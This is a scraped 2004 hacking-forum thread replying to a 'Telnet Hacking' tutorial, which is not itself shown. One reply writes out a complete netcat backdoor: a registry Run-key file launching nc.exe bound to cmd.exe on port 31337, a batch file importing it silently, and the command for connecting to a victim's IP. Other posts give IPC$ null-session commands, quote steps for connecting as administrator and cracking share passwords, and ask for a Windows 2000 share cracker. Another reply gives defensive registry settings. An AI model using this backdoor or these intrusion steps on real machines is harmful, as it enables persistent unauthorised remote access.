I tried to descripe Microsoft Telnet Hacking.
Read it please and tell me your comments plz.
Full Version: [tut] Telnet Hacking
Good idea for a backdoor
thanks for the explanations
thanks for the explanations
that works as well as following does with netcat
I know the topic was about telnet but whatever I post it anyway =)
create a reg file ie. 'foo.reg' which contains ...
-----------------------------------------------
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"nc"="nc.exe -d -L -t -p 31337 -e cmd.exe"
-----------------------------------------------
create a 'foo.bat' which contains ...
-----------------------------------------------
@echo off
regedit /s foo.reg
------------------------------------------------
place the nc.exe , foo.reg and foo.bat in c:\windows\system32\ (on remote computer)
run the foo.bat [c:\windows\system32\start foo.bat] (on remote computer)
now nc will start every time windows starts and will listen on port 31337 on the remote computer. so you just run .... nc [victim ip] 31337 (on local computer)
And now you have a more stable shell =)
I know the topic was about telnet but whatever I post it anyway =)
create a reg file ie. 'foo.reg' which contains ...
-----------------------------------------------
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"nc"="nc.exe -d -L -t -p 31337 -e cmd.exe"
-----------------------------------------------
create a 'foo.bat' which contains ...
-----------------------------------------------
@echo off
regedit /s foo.reg
------------------------------------------------
place the nc.exe , foo.reg and foo.bat in c:\windows\system32\ (on remote computer)
run the foo.bat [c:\windows\system32\start foo.bat] (on remote computer)
now nc will start every time windows starts and will listen on port 31337 on the remote computer. so you just run .... nc [victim ip] 31337 (on local computer)
And now you have a more stable shell =)
Thanks, but I prefer telnet a LOT as it provide a password 
nice research there lilttlehacker! (btw, A.3- win2k has this option as "Management" only).. def. keeping this for reference.. thanks
im a lil lost here with everything
good guide !
Btw does anybody knows a good free ssh-server for Windows?
Btw does anybody knows a good free ssh-server for Windows?
| QUOTE (LittleHacker @ May 6 2004, 08:02 PM) |
| I tried to descripe Microsoft Telnet Hacking. Read it please and tell me your comments plz. |
I tried to test telnet locally, but I can't find the NTLM key in HKLM/Software/Microsoft/TelnetServer/1.0/
Should I create it? I'm running WinXP Pro sp1
thanks
PS: and could someone post a link to a good IPC$ null sessions hacking paper plz?
hey, thanks, nice topic!
andream! ipc$ null session is just a netbios connection without password!
andream! ipc$ null session is just a netbios connection without password!
For Null session Hacking Try NAT!
Can't open PDF... Adobe Reader 6 says "There was an error opening this document. The file is damaged and could not be repaired".
Is this wrong only for me ?
Is this wrong only for me ?
me too
i can't open this file or any other attached file :S
i can't open this file or any other attached file :S
PDF worked fine for me, nice read there
I've created it for Acrobat Reader v.5.0 and later
The tutorial is easy and not messy... so great tut 
I should expect alot more reply's though for this kinda HELPFUL, selfwritten tut..
Good job!!
Serhat
I should expect alot more reply's though for this kinda HELPFUL, selfwritten tut..
Good job!!
Serhat
Good dude, I will write a small note about Null Session, Here we go.
All variations of the Windows NT kernel have a major security flaw: They allow a peculiar form of access called a null or anonymous session, which can yield dangerous information about a machine and its SAM (Security Accounts Manager) accounts. SAM is a local security database that stores information about all of a machine's user and group accounts. Discovering a SAM account with administrative privileges would be a hacker's first objective—but getting the name of any account is a big step. With a user name, a hacker has a hope of eventually breaking into the user's account, then jacking up account privileges to the admin level.
There is a reason Windows allows anonymous access. In a trusted environment, this lets Windows NT, 2000, and XP machines see one another's shared folders and attached peripherals via the InterProcess communication share (IPC$). Allowing IPC$ is a must for some simple peer networks.
But IPC$ also allows entry to client machines. A hacker who types
net use \\yourcomputer\ipc$ "" /user:""
at a command line (where yourcomputer is either your internal IP address or your NetBIOS machine name) is assigned a blank name and password and connected to your PC. Establishing a null session like this does not allow control of your machine, but it does reveal all the user names on your system, the groups your system belongs to, the rights it has, and any shares available.
By setting or modifying a value in the Registry, you can restrict anonymous access. For Windows NT or 2000, go to HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa. Look in the right-hand pane for the DWORD value RestrictAnonymous. If you don't find it, right-click in the right-hand pane, choose Edit | New | DWORD Value, and name the value RestrictAnonymous.
In Windows NT with Service Pack 3 or in Windows 2000, the data for this value can be 0, 1, or 2 (we'll get to Windows XP in a moment). If it's 2, you're all set. No information can leak via a null session, because there is no way to establish one. If the value is 1 (all that was allowed before Windows NT with SP3), some tools can still enumerate information. If it is 0, your machine is wide open. Double-click on the value and set its data to 1 or 2, then restart the system.
Although 2 is preferable, it may cause connectivity and sharing problems when used outside of an environment running only Windows 2000. For example, down-level clients won't be able to establish access to the domain the Windows 2000 machine is hosting; that effectively closes those clients off from the network's resources.
Windows XP solves the problems that a setting of 2 can introduce by adding more flexibility to null-session restrictions. In addition to RestrictAnonymous, Windows XP has two other DWORD values you can modify—RestrictAnonymousSAM and EveryoneIncludesAnonymous. Set RestrictAnonymous to 1 to limit access to share information, and set RestrictAnonymousSAM to 1 to prevent enumeration of SAM accounts. Finally, assign EveryoneIncludesAnonymous a value of 0, which will keep null-session users from having any rights. This still allows the establishment of a null session, so basic network resources such as files and printers remain available to all trusted users, but nothing will leak.
Prevent Hacking, Protect your environment.
Manu
All variations of the Windows NT kernel have a major security flaw: They allow a peculiar form of access called a null or anonymous session, which can yield dangerous information about a machine and its SAM (Security Accounts Manager) accounts. SAM is a local security database that stores information about all of a machine's user and group accounts. Discovering a SAM account with administrative privileges would be a hacker's first objective—but getting the name of any account is a big step. With a user name, a hacker has a hope of eventually breaking into the user's account, then jacking up account privileges to the admin level.
There is a reason Windows allows anonymous access. In a trusted environment, this lets Windows NT, 2000, and XP machines see one another's shared folders and attached peripherals via the InterProcess communication share (IPC$). Allowing IPC$ is a must for some simple peer networks.
But IPC$ also allows entry to client machines. A hacker who types
net use \\yourcomputer\ipc$ "" /user:""
at a command line (where yourcomputer is either your internal IP address or your NetBIOS machine name) is assigned a blank name and password and connected to your PC. Establishing a null session like this does not allow control of your machine, but it does reveal all the user names on your system, the groups your system belongs to, the rights it has, and any shares available.
By setting or modifying a value in the Registry, you can restrict anonymous access. For Windows NT or 2000, go to HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa. Look in the right-hand pane for the DWORD value RestrictAnonymous. If you don't find it, right-click in the right-hand pane, choose Edit | New | DWORD Value, and name the value RestrictAnonymous.
In Windows NT with Service Pack 3 or in Windows 2000, the data for this value can be 0, 1, or 2 (we'll get to Windows XP in a moment). If it's 2, you're all set. No information can leak via a null session, because there is no way to establish one. If the value is 1 (all that was allowed before Windows NT with SP3), some tools can still enumerate information. If it is 0, your machine is wide open. Double-click on the value and set its data to 1 or 2, then restart the system.
Although 2 is preferable, it may cause connectivity and sharing problems when used outside of an environment running only Windows 2000. For example, down-level clients won't be able to establish access to the domain the Windows 2000 machine is hosting; that effectively closes those clients off from the network's resources.
Windows XP solves the problems that a setting of 2 can introduce by adding more flexibility to null-session restrictions. In addition to RestrictAnonymous, Windows XP has two other DWORD values you can modify—RestrictAnonymousSAM and EveryoneIncludesAnonymous. Set RestrictAnonymous to 1 to limit access to share information, and set RestrictAnonymousSAM to 1 to prevent enumeration of SAM accounts. Finally, assign EveryoneIncludesAnonymous a value of 0, which will keep null-session users from having any rights. This still allows the establishment of a null session, so basic network resources such as files and printers remain available to all trusted users, but nothing will leak.
Prevent Hacking, Protect your environment.
Manu
Nice Tutorial, good work
hi,
to start with this tutorial one needs to know the pass of a remote pcs admin account. thats exactly my problem.
i went through several articles in the articles section but that stuff didn't work for me.
gsec/articles/HackingaWindows2000systemthroughIPC.php for example:
2: Connecting to the IPC$
A. Open a DOS window
B. Type in " net use \\ipaddress\ipc$ "" /user:administrator "
C. If you connect to the system, it will say, " The command was completed successfully "
D. If it says, "bad username or password", Try running PQWak.exe to crack the share name password. Then...
on another page i've read pqwak can only crack win95/98/ME shares
. i tried it on my unpatched win2k vm and i didn't work.
could someone plz give me a tool to crack win2k shares? . another question is there a way to crack win2k via netbios if there aren'T any open shares but file sharing enabled?
to start with this tutorial one needs to know the pass of a remote pcs admin account. thats exactly my problem.
i went through several articles in the articles section but that stuff didn't work for me.
gsec/articles/HackingaWindows2000systemthroughIPC.php for example:
2: Connecting to the IPC$
A. Open a DOS window
B. Type in " net use \\ipaddress\ipc$ "" /user:administrator "
C. If you connect to the system, it will say, " The command was completed successfully "
D. If it says, "bad username or password", Try running PQWak.exe to crack the share name password. Then...
on another page i've read pqwak can only crack win95/98/ME shares
. i tried it on my unpatched win2k vm and i didn't work.could someone plz give me a tool to crack win2k shares? . another question is there a way to crack win2k via netbios if there aren'T any open shares but file sharing enabled?
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
